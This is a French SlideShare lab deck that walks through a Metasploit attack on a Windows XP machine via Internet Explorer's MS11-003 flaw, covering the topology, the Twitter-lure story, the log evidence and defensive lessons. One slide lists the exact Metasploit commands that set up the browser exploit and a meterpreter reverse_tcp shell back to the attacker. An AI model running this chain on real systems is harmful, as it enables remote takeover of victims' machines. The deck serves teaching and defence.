Scenarios Metasploit                                                      Scenario 1Http:://labs.zataz.com - Http://twitte...
Scénario 1: Topologie           Target                        Firewall                         Attacker                   ...
Scénario 1: Règles Firewall• L’administration du Firewall s’effectue par SSH par le biais du réseau local.• Le réseau inte...
Scénario 1: Story-Board✤   Cette topologie réseau correspond à la plupart des réseaux ADSL d’internautes et aussi    à la ...
Scénario 1: Commandesuse exploit/windows/browser/ms11_003_ie_css_importset SRVHOST 192.168.178.21set SRVPORT 80set URIPATH...
Scénario 1: EvidencesUn processus Internet Explorer est créé :A new process has been created:New Process ID:     3200Image...
Scénario 1: Leçons apprises•Mettre à jour son OS et ses applications !•Ne pas exécuter les applications avec des privilège...
Prochain SlideShare
Chargement dans…5
×

Scénarios d'exploitation Metasploit - FR : Scénario 1

1 606 vues

Publié le

Premier scénario de la série de scénarios d'exploitation par Metasploit

Publié dans : Technologie
0 commentaire
2 j’aime
Statistiques
Remarques
  • Soyez le premier à commenter

Aucun téléchargement
Vues
Nombre de vues
1 606
Sur SlideShare
0
Issues des intégrations
0
Intégrations
283
Actions
Partages
0
Téléchargements
41
Commentaires
0
J’aime
2
Intégrations 0
Aucune incorporation

Aucune remarque pour cette diapositive
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • Scénarios d'exploitation Metasploit - FR : Scénario 1

    1. 1. Scenarios Metasploit Scenario 1Http:://labs.zataz.com - Http://twitter.com/eromang
    2. 2. Scénario 1: Topologie Target Firewall Attacker Gateway 192.168.111.0/24 192.168.178.0/24 Target : - Windows XP SP3 - L’utilisateur utilise un compte admin - IP : 192.168.111.129 - Gateway par défaut : 192.168.111.128 - Pas d’anti-virus / Firewall Windows Windows activé - Vulnérable à MS11-003 Firewall Gateway : - Eth0 : 192.168.111.128 (interface interne) - Eth1 : 192.168.178.59 (interface externe) Attacker : - IP : 192.168.178.21
    3. 3. Scénario 1: Règles Firewall• L’administration du Firewall s’effectue par SSH par le biais du réseau local.• Le réseau interne peut effectuer des requêtes «Any» vers le réseau externe
    4. 4. Scénario 1: Story-Board✤ Cette topologie réseau correspond à la plupart des réseaux ADSL d’internautes et aussi à la configuration réseau classique des petites et moyennes entreprises.✤ L’attaquant envoi un message Twitter à la victime. Le message contient une URL malveillante (qui peut être réduite) qui exploitera la vulnérabilité Internet Explorer MS11-003.✤ La victime clique sur le lien fournis et la vulnérabilité MS11-003 est exploitée.✤ Après l’exploitation de la vulnérabilité un «payload» meterpreter reverse_tcp est initié sur le port 4444/TCP de l’attaquant.✤ Aucune post exploitations ne sera abordée dans ce scénario.
    5. 5. Scénario 1: Commandesuse exploit/windows/browser/ms11_003_ie_css_importset SRVHOST 192.168.178.21set SRVPORT 80set URIPATH /readme.htmlset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.178.21exploitsysinfoipconfigroutegetuid
    6. 6. Scénario 1: EvidencesUn processus Internet Explorer est créé :A new process has been created:New Process ID: 3200Image File Name: C:Program FilesInternet Exploreriexplore.exeCreator Process ID: 2224User Name: romangDomain: ERIC-FD2123B3C5Logon ID: (0x0,0x62764)Le processus Internet Explorer créé un nouveau processus «notepad.exe» :A new process has been created:New Process ID: 3972Image File Name: C:WINDOWSsystem32notepad.exeCreator Process ID: 3200User Name: romangDomain: ERIC-FD2123B3C5Logon ID: (0x0,0x62764)Les logs sur le Firewall :Feb 21 15:31:52 fw1 kernel: [18410.843231] RULE 5 -- ACCEPT IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=192.168.178.21 LEN=48 TOS=0x00PREC=0x00 TTL=127 ID=2845 DF PROTO=TCP SPT=1078 DPT=4444 WINDOW=64240 RES=0x00 SYN URGP=0
    7. 7. Scénario 1: Leçons apprises•Mettre à jour son OS et ses applications !•Ne pas exécuter les applications avec des privilèges administrateur !•Ne jamais cliquer sur des liens inconnus, surtout raccourcis, provenant de sources !•Installer un anti-virus et ne pas avoir confiance dans celui-ci :)•Ne pas faire confiance à vos Firewall (locaux ou distant) !•Ne pas autoriser des connexions sortantes du type «Any» depuis votre réseau internevers des réseaux qui ne sont pas de confiance ! Limiter les connexions sortantes à vosvéritables besoins. 7

    ×